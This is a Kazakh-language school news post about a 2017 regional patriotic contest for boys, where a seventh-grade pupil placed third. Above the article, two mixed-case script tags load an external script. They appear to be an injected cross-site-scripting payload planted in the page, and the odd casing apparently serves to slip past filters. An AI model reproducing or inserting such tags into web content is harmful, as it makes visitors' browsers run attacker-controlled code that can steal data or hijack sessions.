<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.05.2017

Біз еліміздің ұланымыз.

Мамыр айының  3 күні  Отан  қорғаушылар күніне арналған «Біз еліміздің ұланымыз»  атты ер балалар арасындағы

облыстық байқауы өтті. Бұл сайыстың мақсаты: елін, жерін, тілін қорғайтын білімді де, білікті нағыз  Қазақстан

патриотын тәрбиелеу. Сайысқа сегіз қырлы,  бір сырлы, сөйлеу шеберліктері  жетілген оқушылар қатысты. Байқау 3 кезеңнен тұрды.

1.    «Таныстырсам өзімді»

2.    «Білгенге маржан»

3.    «Сегіз қырлы, бір сырлы»

Әр кезеңнің шарттары: қатысушы еркіне қарай өзін – өзі таныстыру, салт – дәстүрге, әдет – ғұрыпқа байланысты сұрақтарға жауап беру және жанды дауыспен  патриоттық ән орындау. Сайысқа ауданнан бірнеше мектептер қатысты. Біздің мектептің намысын қорғауға 7-сынып оқушысы Қайырбеков Айдар қатысып, барлық кезеңдерден сүрінбей

өтіп, 3-орынға ие болды. Өз атымнан және ұстаздардың атынан Айдарға осындайжетістерге жете беруіне тілектеспіз. Болашақта биік шыңдарды  бағындыра бер!

Өскелең ұрпақты  Отаншылдыққа тәрбиелеудің бірден – бір жолы осындай сайыстар.

Патриотизм – отбасына, кіндік қаны тамған жеріне, қоршаған ортасына, топырағы мен табиғатына, еліне деген құрметтен, сүйіспеншіліктен бастау алады. Міне, осындай сайыстар көп болатын  болса, болашақ жастардың бойына, Отанға, салт – дәстүрге, тілге деген махаббат отын жүрегіне ұялатады.

Просмотров: 393


Пікір қосу



Деректерді қолтаңбаға қосу